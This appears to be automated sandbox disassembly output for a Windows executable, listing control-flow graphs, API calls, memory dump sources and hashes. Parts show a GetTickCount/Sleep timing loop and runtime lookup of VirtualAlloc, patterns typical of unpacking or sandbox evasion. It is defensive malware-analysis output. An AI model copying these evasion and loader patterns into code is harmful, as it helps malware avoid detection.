427063 lstrcpyn GetThreadLocale GetLocaleInfoA 24789->24791 24793 427193 24791->24793 24794 42709a 24791->24794 24792 426fff RegQueryValueExA 24795 42703d RegCloseKey 24792->24795 24796 42701f RegQueryValueExA 24792->24796 24793->24702 24794->24793 24797 4270aa lstrlen 24794->24797 24795->24702 24796->24795 24799 4270c3 24797->24799 24799->24793 24800 4270f1 lstrcpyn LoadLibraryExA 24799->24800 24801 42711d 24799->24801 24800->24801 24801->24793 24802 427127 lstrcpyn LoadLibraryExA 24801->24802 24802->24793 24803 42715d lstrcpyn LoadLibraryExA 24802->24803 24803->24793 24804->24792 24806 426d20 24805->24806 24807 426d3c LoadStringA 24805->24807 24806->24807 24808 426cc4 30 API calls 24806->24808 24809 42559c 24807->24809 24808->24807 24814 425570 23 API calls 24809->24814 24811 4255ac 24815 4254ac 11 API calls 24811->24815 24813 4255c4 24813->24706 24814->24811 24815->24813 24816 42545e 24817 423a80 23 API calls 24816->24817 24818 425476 CreateThread 24817->24818 24819 425428 24818->24819 24820 425430 24819->24820 24825 423ab0 24820->24825 24823 425452 24826 423ab5 24825->24826 24827 423ac8 24825->24827 24826->24827 24830 423bb4 11 API calls 24826->24830 24829 4254a2 RtlExitUserThread 24827->24829 24829->24823 24830->24827 24831 4fd3a0 GetTickCount 24832 4fd3b4 Sleep 24831->24832 24833 4fd3c3 24832->24833 24833->24832 24834 4fd3de GetTickCount 24833->24834 24835 4fd402 24834->24835 24835->24833

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                        • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                        • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                        • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                                                                        • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                                                                        • RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                                                                        • RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1759228003-2375825460
                                                                                                        • Opcode ID: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction ID: 0e10cd6e0dd10fa29fec1e3e1da35663d577b7123c6a2922c9f71c4ecc8ba752
                                                                                                        • Opcode Fuzzy Hash: ae58131e95117afb35a294d1eeeede93b20aad7f2b23c3b62aea4443ab3f3cba
                                                                                                        • Instruction Fuzzy Hash: C7616771F0421DBEEB10D6E5DD45FEF77BC9F08704F804096B604E6282D6BC9A458B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                                                                        APIs
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                        • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                                                                        • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 25 427063-427094 lstrcpyn GetThreadLocale GetLocaleInfoA 26 427193-427199 25->26 27 42709a-42709e 25->27 28 4270a0-4270a4 27->28 29 4270aa-4270c1 lstrlen 27->29 28->26 28->29 30 4270c6-4270cc 29->30 31 4270d9-4270e2 30->31 32 4270ce-4270d7 30->32 31->26 34 4270e8-4270ef 31->34 32->31 33 4270c3 32->33 33->30 35 4270f1-42711b lstrcpyn LoadLibraryExA 34->35 36 42711d-42711f 34->36 35->36 36->26 37 427121-427125 36->37 37->26 38 427127-42715b lstrcpyn LoadLibraryExA 37->38 38->26 39 42715d-427191 lstrcpyn LoadLibraryExA 38->39 39->26
                                                                                                        APIs
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00427073
                                                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00427080
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00427086
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 004270B1
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427106
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427116
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00427142
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00427152
                                                                                                        • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0042717C
                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0042718C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                        • API String ID: 1599918012-2375825460
                                                                                                        • Opcode ID: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction ID: 6819206e02db4054dcb3158c82514520f17620e85cdb7c91ac9952129f30eab0
                                                                                                        • Opcode Fuzzy Hash: 9e2ade6073610427fdacc7a77669d88accc657c9afcb484c93a8f93563c00e38
                                                                                                        • Instruction Fuzzy Hash: C3316471F04219BEDB15DAE8D845FEF77BD9F48304F8040A6A144E3286D6BC9E458B68

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 89 4fd43e-4fd448 call 4fd214 87->89 90 4fd44a-4fd44c 87->90 91 4fd437 88->91 92 4fd3d1-4fd3dc 88->92 89->90 90->86 91->87 92->91 94 4fd3de-4fd400 GetTickCount 92->94 96 4fd414-4fd420 94->96 97 4fd402-4fd412 94->97 96->91 98 4fd422-4fd432 call 4fdb20 96->98 97->96 98->91
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$Sleep
                                                                                                        • String ID: d5R$2R
                                                                                                        • API String ID: 4250438611-1222254985
                                                                                                        • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                                                                        • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 4fd3a0-4fd3af GetTickCount 86 4fd3b4-4fd3c1 Sleep 85->86 87 4fd439-4fd43c 86->87 88 4fd3c3-4fd3cf 86->88 89 4fd43e-4fd448 call 4fd214 87->89 90 4fd44a-4fd44c 87->90 91 4fd437 88->91 92 4fd3d1-4fd3dc 88->92 89->90 90->86 91->87 92->91 94 4fd3de-4fd400 GetTickCount 92->94 96 4fd414-4fd420 94->96 97 4fd402-4fd412 94->97 96->91 98 4fd422-4fd432 call 4fdb20 96->98 97->96 98->91
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountTick$Sleep
                                                                                                        • String ID: d5R$2R
                                                                                                        • API String ID: 4250438611-1222254985
                                                                                                        • Opcode ID: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction ID: e5119978816ca7b13e6ba1b76d2576ade974710567c4596cc4b9e47561d4b79f
                                                                                                        • Opcode Fuzzy Hash: d904b056123a1d9a42c8539f426d4276810768050e0a054d01cb3151bd5b51bc
                                                                                                        • Instruction Fuzzy Hash: FD113670B002449FE306CF6AD884E66B3E7AF99304F81C276E104873A5CB786C86D758
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2187797398.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2187170347.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2187797398.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2193864766.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0ee2b1771d27a12b3de33157dcf94a6c70c31f5f1231773a26f98251efbb0ad1
                                                                                                        • Instruction ID: ed4df61ca57589e4cb6a89f15fcf2a92bf343cb87a1231b53511e749ac9c114a
                                                                                                        • Opcode Fuzzy Hash: 0ee2b1771d27a12b3de33157dcf94a6c70c31f5f1231773a26f98251efbb0ad1
                                                                                                        • Instruction Fuzzy Hash: D9A13EB5901218DFDB14DFA0DE4DBDEB7B4BB48304F1081A9E50AB72A0DB745A84CF54

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 40 564678-564683 41 564685-564689 40->41 42 564699-5646a8 40->42 43 564812-564816 41->43 44 56468f-564693 41->44 45 5646f1-5646f4 42->45 46 56482e-564833 43->46 47 564818-56481c 43->47 44->42 44->43 48 5646f6-564716 02D63A27 02D63A0C 45->48 49 5646aa-5646b0 45->49 47->46 52 56481e-56482b 47->52 53 56478c-564791 48->53 50 5646b2-5646ba 49->50 51 5646ec-5646ef 49->51 50->51 56 5646bc-5646bd 50->56 51->45 52->46 54 564793-5647aa 53->54 55 564718-564725 02D63A27 53->55 59 5647ac-5647af 54->59 60 5647cb-5647d2 54->60 57 564727-564733 02D63983 55->57 58 564735-564737 55->58 61 5646bf-5646cd 56->61 57->58 62 564789 58->62 63 564739-56473d 58->63 59->60 64 5647b1 59->64 65 5647d4-5647d7 60->65 66 5647ea-564810 call 4250a4 60->66 67 5646cf-5646e6 61->67 68 5646e8-5646ea 61->68 62->53 69 564743 63->69 70 56473f-564741 63->70 71 5647b2-5647c9 64->71 65->66 72 5647d9 65->72 66->43 67->68 68->51 68->61 73 564746-564749 69->73 70->73 71->60 71->71 74 5647da-5647e8 72->74 76 564783-564787 73->76 74->66 74->74 76->62 77 56474b-564750 76->77 78 564752-56475f 02D63A0C 77->78 79 564761-564768 02D63A0C 77->79 80 56476d-564773 78->80 79->80 81 564775-56477c 80->81 82 56477e 80->82 83 564780 81->83 82->83 83->76
                                                                                                        APIs
                                                                                                        • 02D63A27.KERNEL32(kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000,00000000), ref: 00564700
                                                                                                        • 02D63A0C.KERNEL32(00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900,00000000), ref: 00564706
                                                                                                        • 02D63A27.KERNEL32(?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000,00143900), ref: 0056471C
                                                                                                        • 02D63983.KERNEL32(?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000,00400000), ref: 0056472E
                                                                                                        • 02D63A0C.KERNEL32(00000000,?,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 0056475A
                                                                                                        • 02D63A0C.KERNEL32(00000000,00000000,?,00000000,kernel32.dll,VirtualAlloc,?,?,?,?,?,006D8A86,0011E000,00119000,00151F7F,00421000), ref: 00564768
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2194116543.0000000000539000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2194116543.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: D63983
                                                                                                        • String ID: VirtualAlloc$kernel32.dll
                                                                                                        • API String ID: 1778511938-2067260499
                                                                                                        • Opcode ID: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                                                                        • Instruction ID: 8910996fa2440a084c299a82da12af2e7996832243bad71df7333c1e6ec95c12
                                                                                                        • Opcode Fuzzy Hash: d6793612300842db5e433cdff9f002e11018828605c84afd6d13a6a167414326
                                                                                                        • Instruction Fuzzy Hash: 85518C7660020A9FDB10CF68D985BAA3BB5FF96318F258254F801AB355D370EC61CF61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
